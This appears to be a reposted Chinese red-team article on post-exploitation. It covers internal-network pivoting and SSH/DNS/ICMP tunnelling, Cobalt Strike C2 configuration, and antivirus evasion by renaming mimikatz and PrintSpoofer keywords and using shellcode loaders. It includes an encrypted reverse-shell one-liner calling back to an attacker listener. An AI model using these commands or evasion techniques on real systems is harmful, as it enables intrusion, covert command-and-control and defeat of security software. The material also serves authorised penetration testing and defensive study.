简介
netsh端口映射
在我们漫游内网的时候,经常会碰到内网机器互通,我们外网的机器却只能访问单个内网机器。这时一个简单的Windows自带的端口转发工具就可以让我们遨游内网:
netsh端口转发监听metperter
CS是APT攻击神器,类似的还有已停止维护的RcRat等C2工具。正向连接不多赘述,无非就是生成listener之后连接后门。
多层内网上线多处在同网段有多个服务器。如果此网段没有局域网防火墙,直接正向连接:可以生成一个TCP的beacon的listener,再生成一个SSL的exe,绑定端口即可。
多层内网如果有防火墙,可选用beacon_reverse_tcp作为listener的payload,绑定host和port。这样服务器1执行后门后,此服务器会自动连接同网段服务器2 。
通过msf拿到服务器权限后,往往开代理进入到内网横向渗透。此时可再开一台虚拟机,设置bp的上游代理为系统代理,再通过代理访问kali,再经过目标服务器访问内网。好处是足够安全,坏处是响应速度较慢。
需要用SocksCap设置socks代理;在bp上的user_options编辑upstream proxy rule。
隧道(tunneling)可将其他TCP端口的数据通过SSH转发,并提供相应加解密服务。好处:加密通信数据、突破防火墙限制,如:
ssh -qTfnN -D 7070 [email protected]
转发MySQL端口:
ssh -L 3306:localhost:3306 [email protected] -fN
远程转发突破内网:
ssh -R 8877:10.10.10.157:80 [email protected]
使用EarthWorm做socks5代理完成内网穿透
封装和简化流量,用来突破防火墙
python proxy.py -u -l [options]
通过ICMP封装穿透防火墙
DNS隧道穿透
最早接触的时候是CS刚开始发布。作为一种隐蔽信道,将其他协议封装在DNS协议中。因为大部分防火墙和IDS很少过滤DNS流量,这种方法很高效。
工具:DNS2tcp或CS。
二、流量加密
在横向渗透时往往需要反弹shell,如果shell是明文传输很容易被IDS或安全软件分析检测流量特征,从而功亏一篑。
在 kali 上使用 OpenSSL 生成自签名证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
在 kali 上监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
在目标上执行反弹 shell 命令
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect
10.10.10.129:8080 > /tmp/s; rm /tmp/s
MSF流量加密
域前置
Cobalt Strike生成证书修改C2 profile
CS默认使用的证书很容易被检测,我们需要重新生成证书,然后创建并修改C2profile文件,其中配置好code-signer,里面有keystore、password、alias等。然后验证是否可用:
./c2lint c2.profile
Windows Defender
360
使用mimi,在vs2012的平台工作集下编译,发现会被查杀。用VS修改源码,把所有的mimikatz关键词修改为其他字符即可。
使用printSpoofer,vs2019选择x64编译,把cpp输出帮助文档全部删除。关键词PrintSpoofer替换为其他关键词,再加一个icon即可。
MSF使用分离加载器免杀360 。
64位免杀编译。Dev-Cpp编译orwelldevcpp。
python3 的shellcode分离免杀。
Golang加载器的shellcode。这种bypass在GitHub有很多,每天都有更新。
C#异或免杀。这个用的比较多,因为文件小便于传输。
掩日。已不再更新,可参考代码。
msf加密壳。如darkarmour
Invoke-PSImage可以把一个powershell脚本字节嵌入PNG图片,并生成一个shell。然后使用CS连接。
MSF通过payload和编码器生成后门前进行编码转换;使用Cooolis-server回连Metasploit RPC服务器。
原文始发于微信公众号(513 Sec):【网络安全】红队攻击后渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论